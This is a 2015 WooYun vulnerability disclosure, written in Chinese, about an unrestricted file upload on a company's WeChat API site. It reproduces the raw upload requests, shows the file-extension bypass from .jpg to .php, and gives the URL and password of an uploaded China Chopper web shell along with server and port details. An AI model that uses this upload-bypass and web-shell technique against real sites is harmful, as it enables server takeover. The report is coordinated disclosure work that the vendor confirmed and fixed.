乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-12: 细节已通知厂商并且等待厂商处理中 2015-03-12: 厂商已经确认,细节仅向厂商公开 2015-03-22: 细节向核心白帽子及相关领域专家公开 2015-04-01: 细节向普通白帽子公开 2015-04-11: 细节向实习白帽子公开 2015-04-26: 细节向公众公开
*
今天看wooyun发现新来的厂商就谷歌了一下。发现一处上传:
http://wx.api.dawenmedia.com/wxdw/register/bride
然后尝试上传上传截图数据如下:
POST /wxdw/upload/save HTTP/1.1Host: wx.api.dawenmedia.comProxy-Connection: keep-aliveContent-Length: 195Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://wx.api.dawenmedia.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmKReferer: http://wx.api.dawenmedia.com/wxdw/register/brideAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106------WebKitFormBoundary5YWHdlXH7ttQHDmKContent-Disposition: form-data; name="myData"; filename="test.jpg"Content-Type: image/jpegtest wooyun------WebKitFormBoundary5YWHdlXH7ttQHDmK--
修改下类型为:
POST /wxdw/upload/save HTTP/1.1Host: wx.api.dawenmedia.comProxy-Connection: keep-aliveContent-Length: 195Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://wx.api.dawenmedia.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmKReferer: http://wx.api.dawenmedia.com/wxdw/register/brideAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106------WebKitFormBoundary5YWHdlXH7ttQHDmKContent-Disposition: form-data; name="myData"; filename="test.txt"Content-Type: txt/txttest wooyun------WebKitFormBoundary5YWHdlXH7ttQHDmK--
尝试上传文本,返回得到:
HTTP/1.1 200 OKContent-Type: text/htmlVary: Accept-EncodingServer: Microsoft-IIS/7.5Date: Thu, 12 Mar 2015 08:40:17 GMTContent-Length: 123{"url":"attachment\/2015\/03\/20150312164017480509.txt","url_thumb":"attachment\/2015\/03\/20150312164017480509_thumb.txt"}
构造路径为:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312164017480509.txt
然后修改为PHP得到路径为:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162755649840.php
然后上传PHP菜刀一句话:得到URL:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162934728860.php
密码pass
服务器为2008系统的服务器
终端端口是33669 到这里了,就不上提权工具提权了。到此为止吧。
危害等级:高
漏洞Rank:10
确认时间:2015-03-12 20:18
已处理,危害挺严重的。
暂无